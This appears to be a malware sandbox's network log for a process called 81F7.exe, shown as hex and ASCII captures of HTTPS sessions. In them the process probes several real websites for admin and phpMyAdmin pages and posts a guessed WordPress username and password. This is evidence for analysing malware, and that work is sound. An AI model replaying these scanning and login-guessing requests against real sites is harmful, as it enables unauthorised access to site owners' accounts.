2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 Data Ascii: nk rel='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' t
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 09 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e Data Ascii: <h1><a href="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><in
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 22 20 76 61 6c 75 65 3d 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 Data Ascii: " value="1" /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 73 3f 76 65 72 3d 33 2e 31 2e 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 Data Ascii: s?ver=3.1.2" id="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src
2024-02-20 23:26:18 UTC	639	IN	Data Raw: 3d 22 75 6e 64 65 72 73 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 Data Ascii: ="underscore-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/w
2024-02-20 23:26:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.6	51090	3.33.130.190	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	166	OUT	GET /admin HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XewGV8wJRO4cvWNKW9pAioYZJvbfmDjdfNxawhfebpi9mjwIg1MzGDGgSTti6MaUkHq0Rp1dc6C7x/fGP8c/gQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:17 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.6	51037	162.0.235.125	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/wp-login.php Content-Length: 137 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:17 UTC	137	OUT	Data Raw: 6c 6f 67 3d 6e 6f 63 69 70 79 26 70 77 64 3d 46 75 63 6b 6d 79 6c 69 66 65 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=nocipy&pwd=Fuckmylife1&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fnorwegischlernen.info%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:18 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5767 date: Tue, 20 Feb 2024 23:26:17 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:18 UTC	5767	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.6	51284	13.248.243.5	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	208	OUT	GET /admin HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:17 GMT Connection: close
2024-02-20 23:26:17 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.6	51394	144.91.85.110	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	164	OUT	GET /pma/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:18 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.6	51414	104.21.54.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:18 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:18 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=8p850ha38al79pkuskhqkgapjl; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
2024-02-20 23:26:18 UTC	497	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 31 38 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 75 51 62 43 25 32 46 6a 25 32 42 45 38 43 7a 34 34 41 65 55 57 42 35 31 30 35 25 32 42 68 38 46 53 31 6a 58 30 65 6f 6a 74 4c 6b 49 76 32 77 48 4a 49 47 77 31 65 76 77 51 68 31 25 32 46 43 6d 73 76 42 4b 6c 30 76 38 44 71 58 64 67 50 45 6c 6c 50 67 58 37 69 72 62 43 74 7a 5a 79 53 6d 6b 42 4d 72 74 33 55 76 53 7a Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:18 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uQbC%2Fj%2BE8Cz44AeUWB5105%2Bh8FS1jX0eojtLkIv2wHJIGw1evwQh1%2FCmsvBKl0v8DqXdgPEllPgX7irbCtzZySmkBMrt3UvSz
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 34 37 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47da<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 